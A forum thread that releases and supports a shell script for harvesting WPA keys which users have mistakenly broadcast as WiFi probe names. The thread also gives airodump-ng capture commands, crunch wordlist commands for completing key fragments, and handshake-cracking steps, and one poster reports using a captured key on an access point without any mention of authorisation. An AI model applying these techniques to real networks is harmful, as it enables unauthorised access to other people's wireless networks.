Results 1 to 24 of 24

Thread: Finding WPA Keys Broadcast In Clear

  1. #1
    Join Date
    2013-Jul
    Posts
    819

    Finding WPA Keys Broadcast In Clear

    ESSIDPROBEWPA3-21.sh has been release for general use.

    The bug when used with kali2.0 and the newer versions of aircrack-ng has been corrected.

    Additions:

    When MTeams associated C-Programmer found essidprobes that were incomplete strings for WPA keys like 7 characters in length - an extensive rewrite of this program resulted. To find the missing characters, crunch was used to fill in the blanks as follows:

    Menu based crunch modules have been included to allow the user to expand ESSIDPROBES using ESSIDPROBE strings as the base words to find any missing characters.

    Specific words can be randomized thru menu driven selections by the user.

    Random characters can be Crunch Character Groups like [0123456789] or selected specific characters like 12Dc just as examples.

    This program can produce large file sizes so care should be used if employed with operating systems having small amounts of storage space such as persistent usb installs of kali2.0.

    To see how the program functions try writing only one(1) character or a specific text string and play with the selections before you make large files based on Crunch Character Groups or large essidprobe text files.

    Users should feel free to suggest other crunch permutations be included. They will be added if possible into latter versions. Any bugs found please advise.

    You can download here with kali or at:

    http://www.datafilehost.com/d/3fb327e4


    Overview

    The most sophisticated ciphers are many times defeated by simple operator error. The German Army High Command(OKW) used enigma in WWII to encrypt messages. The cipher was finally broken when a radio operator sent the same message twice without changing the key settings.

    Wi-Fi managing systems are also prone to operator errors. Musket Teams began seeing WPA keys broadcast in clear text paired with the ESSID name when running airodump-ng. MTeams knew the data pair sent was the WPA key and the station as the code had previously been broken thru other means such as Reaver or brute force. It soon became apparent that two(2) events were occurring. The wifi user was loading the WPA key into the ESSID(AP Name) block of the wifi managing software, The software began probing for a station using the WPA Key as the ESSID(AP Name). Later, when the connection did not work, the user corrected the error by setting up a new connection and leaving the old connection in place. The software then probed the BSSID using both the WPA Key and the ESSID.

    In airodump-ng you might see something like this at the bottom;

    BSSID STATION PROBE
    55:44:33:22:11:00 00:11:22:33:44:55 12345678,Wifi_Home

    or

    BSSID STATION PROBE
    55:44:33:22:11:00 00:11:22:33:44:55 12345678

    Using the screen to collect this data is not practical. The best way is to access the two(2) .csv files made by airodump-ng when using the -w filename (write a dump file) in the airodump-ng command line. Musket Teams then wrote a small program to strip the kismet.csv file and .csv file of relevant data. The script has a commented help file embedded at the top of the script. It gives you a text file suitable for aircrack-ng, pyrit and elcomsoft. And it produces two(2) reference files to help determine ESSID,BSSID,PROBE pairing. This wordlist file has other uses. Sometimes the user loads the ESSID name into the WPA key block. Hence the WPA key is the AP name. This cannot be determined by the scan BUT the wordlist has all the ESSIDs seen therefore it can quickly determine if the WPA key is the ESSID when run against a handshake using aircrack-ng pyrit or elcomsoft.

    For example:

    aircrack-ng wifi.cap -w essidprobesdic,txt

    Musket Teams
    Attached Files Attached Files
    Last edited by mmusket33; 2016-01-11 at 03:26.

  2. #2
    Join Date
    2013-Jul
    Posts
    819
    ESSIDPROBEWPA1-2.sh has been withdrawn.

    You can download

    ESSIDPROBEWPA1-4.sh at

    http://www.datafilehost.com/d/083a4c11


    MTeams

  3. #3
    Join Date
    2015-Mar
    Posts
    2
    @mmusket thanks for your tool ,Hi i have try to test this scrypt but it's always ask for .csv file i have it already in root .But the scrypt told me the file is not here !
    Why?

    I have dumpfile-01.csv and dumpfile-01.kismet.csv in root .

  4. #4
    Join Date
    2013-Jul
    Posts
    819
    To Sherubin

    We downloaded the program from datahost and loaded it on three(3) different computers and the program ran fine. All computers were running kali-linux 1.09a fully updated and upgraded.

    MTeams then tried to simulate the failure. We induced your failure when the program was run from a folder off root so just place this program in root and run it as follows ./ESSIDPROBEWPA1-4.sh

    We will be issuing ESSIDPROBEWPA1-5.sh as soon as we are satisfied with the testing. But the changes have to do with making the essidprobesdic.txt file dos friendly and remove the duplicates that still remain. Look back here in a few days if you are interested.

    Write us again if this has not solved your problem and we will retest again.

    MTeams
    Last edited by mmusket33; 2015-03-03 at 11:07.

  5. #5
    Join Date
    2015-Mar
    Posts
    2
    Yes thanks musket33 it's run fine from root .

  6. #6
    Join Date
    2013-Jul
    Posts
    819
    MTeams has updated to ESSIDPROBEWPA1-5.sh

    This version corrects some duplicate problems and makes the dic file easier to use with aircrack-ng and elcomsoft

    You can download the newer version at:

    http://www.datafilehost.com/d/c161a915

  7. #7
    Join Date
    2013-Jul
    Posts
    819
    WPA Key Fragments Broadcast In Clear Text


    WPA keys in clear text have taken another turn. Our Musket Team C Programmer has found cases where WPA key fragments(i.e. incomplete keys) are being broadcast in clear text. In this case the wifi user is inputting an incomplete WPA key in the ESSID block of the wifi software. When the key doesnot work the user makes another connection and does not remove the older version. The wifi device then probes using both the WPA key Fragment and the essid name.

    These key fragments are easy to discover if they are less then 8 characters in length. However incomplete keys greater then 7 are more difficult to handle.

    A rule of thumb in WPA brute force cracking is that 50% of the keys chosen by users are numeric strings 8 to 10 characters in length. And more then half of these numeric only keys are local telephone numbers.

    You might see something like this in the airodump-ng probes:

    1234567, Wifi Home

    Hence ESSID probes shorter then 8 characters in length that appear to be key fragments might be attacked as follows.

    Most WPA keys are numeric only, 8 to 10 characters in length. If you have elcomsoft and windows use the word attack and check combinations of the string. If not make a series of dictionary files and test it against a handshake.


    For example if you see 1234567, Wifi Home in your probes run crunch

    A simple approach here would be

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234567@ -o File88-01

    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" 1234567@@ -o File99-01

    crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" 1234567@@@ -o File1010-01

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t @1234567 -o File88-02

    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" @@1234567 -o File99-02

    crunch 10 10 "0123456789abcdefghijklmnopqrstuvwxyz" @@@1234567 -o File1010-02


    A more complicated approach would be to work thru ALL the positions making small dictionaries


    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@234567 -o File88c-01

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12@34567 -o File88c-02

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123@4567 -o File88c-03

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1234@567 -o File88c-04

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 12345@67 -o File88c-05

    crunch 8 8 "0123456789abcdefghijklmnopqrstuvwxyz" -t 123456@7 -o File88c-06


    crunch 9 9 "0123456789abcdefghijklmnopqrstuvwxyz" -t 1@2345678 -o File99c-06

    etc etc etc

    All variations are not shown here


    Keys 8 or more in length that do not successfully crack the key thru tools like aircrack-ng might be WPA Key fragments. In such a case the more complicated approach must be employed

    There is a significant social engineering component in successful brute forcing a WPA key. Even if your computer cracking speed is slow, running numeric keys 8 to 10 characters in length against a WPA handshake is possible. If you are given a part of the key the chances of cracking the WPA key increases.

    Mteams are working on an expansion of ESSIDPROBE1-5 to construct these dictionaries automatically. In the meantime if you discover these WPA Fragments in clear text you can try the simple approach above - you might just get lucky.

    Musket Teams

  8. #8
    Join Date
    2013-Jul
    Posts
    819
    MTeams run constant airodump-ng scans listening for both WPA handshakes and WPA keys broadcast in clear text.

    airodump-ng -w scanwifi mon0

    We also get e-mails saying clear text WPA keys cannot occur. Here is a typical example received within the last 24 hours. All ESSID, BSSID info and WPA Key has been sterilized. The WPA key broadcast in clear text is 033441345

    CH 5 ][ Elapsed: 8 s ][ 2015-09-28 07:20

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    55:44:33:22:11:00 -1 0 0 5 0 5 -1 WEP WEP <length: 0>
    66:44:33:22:11:00 -66 0 2 7 1 6 54e WPA CCMP PSK Wifi Name 1
    77:44:33:22:11:00 -72 0 2 0 0 7 54e WPA2 CCMP PSK Wifi Name 2
    88:44:33:22:11:00 -73 19 14 0 0 5 54e. WPA2 CCMP PSK Wifi Name 3

    BSSID STATION PWR Rate Lost Frames Probe

    55:44:66:00:22:33 00:11:22:33:55:77 -57 0 - 1 148 5
    (not associated) 00:11:22:33:44:99 -73 0 - 1 0 1 Wifi Name 4
    (not associated) 00:11:22:33:44:77 -72 0 - 1 0 1 033441345
    (not associated) 00:11:22:33:55:55 -64 0 - 1 0 1
    (not associated) 00:11:22:33:55:55 -75 0 - 1 0 2
    55:44:33:22:11:00 00:11:22:33:44:55 -1 1e- 0 0 2
    66:44:33:22:11:00 00:11:22:33:44:66 -51 0 - 1e 43 5


    You can quickly check for handshakes by running

    wpaclean scanwifi-01a.cap scanwifi-01.cap

    Where:

    scanwifi-01a.cap is cleaned file

    scanwifi-01.cap is original file


    This will give a list of WPA handshakes on the screen and can be run anytime even while airodump-ng is collecting data.

    MTeams
    Last edited by mmusket33; 2015-09-28 at 01:21.

  9. #9
    It looks like very good. Thanks for your sharing.








    huawei nexus 6p tasche
    Last edited by basto; 2015-09-29 at 06:33.

  10. #10
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    This happened to me, i was scanning away when i noticed what looked like a WPA key on the probe column, so i tested it on the AP and it worked.
    Never seen this before, any idea why it was shown, been scanning again and its not shown second time.

    The only reason that you fail is because you quit....

  11. #11
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    MTeams are constantly learning field craft. We see these probes all the time but you have to know what to look for. In fact we saw one this morning.

    With airodump-ng what is kept on the screen for view is for only 120 sec unless you add the --berlin 1,000,000 to the command line. Also add the --beacons to increase the number of becons stored. See airodump-ng --help

    Example:

    airodump-ng --berlin 1000000 --beacons -w dumpfile mon0

    After you capture this data run it thru our ESSIDPROBEWPA.sh

    Note MTeams will add these commands to the airodump-ng command lines when we update handshakeharvest2-5.sh

    Musket Teams
    Last edited by mmusket33; 2015-10-30 at 03:17.

  12. #12
    Join Date
    2015-Oct
    Posts
    8
    Ive been looking at these 'Probe' characters since I started with pentesting (2 weeks back).
    In fact, initially I did a web search for probe stations to figure what they actually are/were, but no info or TMI.

    Once again, thx MTeams for pointing this out, will keep an eye for these things.
    Is this script kali 2.0 compatible ?

  13. #13
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To zerocool

    MTeams are constantly learning field craft. We see these probes all the time but you have to know what to look for. In fact we saw one this morning.

    With airodump-ng what is kept on the screen for view is for only 120 sec unless you add the --berlin 1,000,000 to the command line. Also add the --beacons to increase the number of becons stored. See airodump-ng --help

    Example:

    airodump-ng --berlin 1000000 --beacons -w dumpfile mon0

    After you capture this data run it thru our ESSIDPROBEWPA.sh

    Note MTeams will add these commands to the airodump-ng command lines when we update handshakeharvest2-5.sh

    Musket Teams
    I have tried to do what you said, but both text files are empty ?> what am doing wrong?>?

    Does this look correct to you.
    Last edited by zerocool; 2015-11-02 at 09:59. Reason: added screnshot
    The only reason that you fail is because you quit....

  14. #14
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    Thanks for pointing out this out.

    We ran some test with kali 1.1 and it ran fine so we cranked up kali 2.0 and it did not run. We traced the error to airodump-ng csv output which looks like it has changed slightly which cause one of the awk lines to fail.

    We do not have alot of .csv files captured thru k2.0. to test this so will capture a big block of data and rewrite the program to fit the newer airodump-ng output.

    Again Thanks!!!

    MTeams
    Last edited by mmusket33; 2015-11-02 at 13:03.

  15. #15
    Join Date
    2015-May
    Posts
    18
    I got some strange probe.

    probe.jpg

    It seems that not only ssid and wpa-key can be found, but also local ip XD

  16. #16
    Join Date
    2013-Mar
    Location
    Root
    Posts
    13
    Quote Originally Posted by mmusket33 View Post
    To zerocool

    Thanks for pointing out this out.

    We ran some test with kali 1.1 and it ran fine so we cranked up kali 2.0 and it did not run. We traced the error to airodump-ng csv output which looks like it has changed slightly which cause one of the awk lines to fail.

    We do not have alot of .csv files captured thru k2.0. to test this so will capture a big block of data and rewrite the program to fit the newer airodump-ng output.

    Again Thanks!!!

    MTeams
    Any eta on this, while we wait isn't there a copmmand or another way to output any keys found in the dumpfile.
    The only reason that you fail is because you quit....

  17. #17
    Join Date
    2013-Jul
    Posts
    819
    To zerocool

    The are no tools for this as far as we know. This approach was not even recognized.

    To do this manually will take time if you have allot of .csv data. You could open up each .csv file collected by airodump-ng and look for any text strings that look like like WPA key. And then there is the fact that users may load the AP name into the WPA key block so the WPA Key and the ESSID are the same.
    MTeams has stopped all other projects to correct this as any of our lab programs if airodump-ng is run also collect data on the side and then send it to a textfile for brute force work. The program is running we are just adding modules to handle cases where the user inputs the WPA key incorrectly and the length is less then 8. I would think within three to five days unless the waves become rideable.

    MTeams

  18. #18
    Join Date
    2013-Jul
    Posts
    819
    ESSIDPROBEWPA3-21.sh has been release for general use.

    See start of thread for version commentary.

    You can download at:

    http://www.datafilehost.com/d/3fb327e4

    MTeams
    Last edited by mmusket33; 2016-01-11 at 02:52.

  19. #19
    Join Date
    2013-Jul
    Posts
    819
    Those working with csv files may find the following script useful see:


    http://forum.aircrack-ng.org/index.php/topic,898.0.html


    Musket Teams

  20. #20
    Join Date
    2013-May
    Posts
    1
    nice work thanks to MTeams

  21. #21
    Join Date
    2016-Aug
    Posts
    1
    Thank you for the info and for sharing it!

  22. #22
    Join Date
    2013-Jul
    Posts
    819
    To KabelHorst and Maculo:


    May the password be with you

    Musket Teams

  23. #23
    Join Date
    2013-Jul
    Posts
    819
    Chris has issued an update to his csv program.

    See https://forum.aircrack-ng.org/index....pic,898.0.html

    Musket Teams

  24. #24
    Join Date
    2017-Jan
    Posts
    65
    Quote Originally Posted by mmusket33 View Post
    Chris has issued an update to his csv program.
    v0.5 now: https://forum.aircrack-ng.org/index....ebvn86#msg4550

Similar Threads

  1. Arpspoof broadcast
    By lika in forum General Archive
    Replies: 0
    Last Post: 2016-09-16, 14:45
  2. problem wih clear command
    By psanjay679 in forum TroubleShooting Archive
    Replies: 1
    Last Post: 2016-01-03, 02:20
  3. Replies: 1
    Last Post: 2014-10-22, 02:25

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •